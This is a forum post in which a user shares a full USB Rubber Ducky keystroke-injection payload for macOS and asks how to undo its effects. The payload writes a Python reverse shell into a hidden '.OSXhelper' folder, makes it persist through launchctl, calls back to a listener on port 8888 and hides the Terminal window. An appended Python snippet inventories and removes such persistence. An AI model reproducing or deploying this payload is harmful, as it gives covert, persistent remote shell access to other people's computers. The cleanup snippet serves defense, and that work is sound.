
osx reverse shell payload ... undo?


brazen

I downloaded the osx reverse shell payload from: http://sunstudiophoto.com/ducky/

I turned on my VPN, got my external IP address, and plugged the IP address into the script:

DELAY 3000

GUI SPACE

DELAY 500

STRING Utilities

DELAY 1000

ENTER

DELAY 1000

STRING terminal

GUI DOWNARROW

DELAY 3500

STRING cd ~

ENTER

STRING mkdir .OSXhelper

ENTER

STRING cd .OSXhelper

ENTER

STRING echo "python -c 'import socket,subprocess,os;

STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

STRING s.connect((\"192.168.0.13\",8888));

STRING os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > helper.sh

ENTER

STRING chmod +rwx helper.sh

ENTER

STRING launchctl submit -l yes -p ~/.OSXhelper/helper.sh

ENTER

STRING ./helper.sh&

ENTER

DELAY 500

STRING exit

ENTER

DELAY 500

GUI q

DELAY 500

GUI w

Then I ran:

netcat -l -p 8888

BAMMMM! EVERYTHING WORKS PERFECTLY!!!!

However, afterwards I went back in and deleted the .OSXhelper folder and .maintScript folder (from the other simple-ducky payload generator), closed Terminal... and went to test another payload for OSX.

When I typed again on the Kali terminal

netcat -l -p 8888

I get an error message:

"shell-init: error retrieving current directory: getcwd: cannot access parent directories: no such file or directory.

sh-3.2$"

How do I stop this from happening?
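Added example, not part of the original post: the script above registers a launchd job with `launchctl submit`, which launchd keeps alive, so deleting the folder alone does not unregister it. The Python sketch below inventories what such a script changes (launchd jobs, created directories, callback endpoints) and orders the cleanup so the job is removed before its files. The sample input is constructed from the post's lines, and the function names and the assumption that Terminal opens in the home directory are mine.

```python
import re
import shlex

# Constructed sample: the state-changing STRING lines from the post's script.
SAMPLE = r'''
STRING cd ~
STRING mkdir .OSXhelper
STRING cd .OSXhelper
STRING echo "python -c 'import socket,subprocess,os;
STRING s.connect((\"192.168.0.13\",8888));
STRING chmod +rwx helper.sh
STRING launchctl submit -l yes -p ~/.OSXhelper/helper.sh
STRING ./helper.sh&
'''

def triage(script, cwd="~"):
    """List launchd jobs, created directories and callback endpoints.

    cwd="~" assumes Terminal opens in the home directory (an assumption).
    """
    found = {"jobs": [], "dirs": [], "endpoints": []}
    for line in script.splitlines():
        if not line.startswith("STRING "):
            continue  # DELAY, ENTER, GUI ... type nothing into the shell
        cmd = line[len("STRING "):]
        m = re.search(r'connect\(\(\\?"([^"\\]+)\\?",\s*(\d+)\)\)', cmd)
        if m:
            found["endpoints"].append((m.group(1), int(m.group(2))))
            continue
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue  # fragment of a quoted string spanning several lines
        if argv[:1] == ["cd"] and len(argv) > 1:
            # Track the working directory so relative mkdir paths resolve.
            cwd = argv[1] if argv[1].startswith(("~", "/")) else f"{cwd}/{argv[1]}"
        elif argv[:1] == ["mkdir"]:
            found["dirs"] += [f"{cwd}/{d}" for d in argv[1:] if not d.startswith("-")]
        elif argv[:2] == ["launchctl", "submit"]:
            opts = dict(zip(argv[2::2], argv[3::2]))  # -l label, -p program
            found["jobs"].append((opts.get("-l"), opts.get("-p")))
    return found

def cleanup_plan(found):
    """Unregister launchd jobs first, then delete the files they ran."""
    plan = [f"launchctl remove {shlex.quote(label)}" for label, _ in found["jobs"] if label]
    plan += [f"rm -rf {d}" for d in found["dirs"]]
    return plan
```

For the script in the post, `cleanup_plan(triage(SAMPLE))` yields `launchctl remove yes` followed by `rm -rf ~/.OSXhelper`; `launchctl list` on the Mac shows whether a job with that label is still loaded.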
